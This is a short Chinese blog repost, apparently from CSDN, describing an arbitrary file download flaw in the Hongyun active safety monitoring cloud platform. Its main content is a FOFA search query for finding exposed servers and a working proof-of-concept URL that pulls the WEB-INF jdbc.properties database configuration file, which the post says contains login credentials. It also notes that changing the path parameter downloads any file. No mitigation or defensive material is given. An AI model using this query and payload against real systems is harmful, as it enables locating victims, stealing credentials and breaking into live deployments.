0
0

鸿运主动安全云平台任意文件下载漏洞复习

简介

深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码

漏洞复现

FOFA语法:body="./open/webApi.html"

获取网站数据库配置文件

POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

可直接下载到该文件

替换path=后的文件可导致任意文件下载:

标签: 安全
本文转载自: https://blog.csdn.net/l1593572468/article/details/134212198
版权归原作者 Cheng-Ling 所有, 如有侵权,请联系我们删除。
登录后发布评论

“鸿运主动安全云平台任意文件下载漏洞复习”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

Windows 安全日志解析

ONLYOFFICE 8.2版本产品评测——遥遥领先,助力自动化办公

selenium学习之第一个selenium IDE实例操作

Kafka技术详解[3]: 生产与消费数据

深入探究RabbitMQ工作队列模式实现

SpringSecurity前端应用安全集成指南

Ubuntu网卡配置

文章导航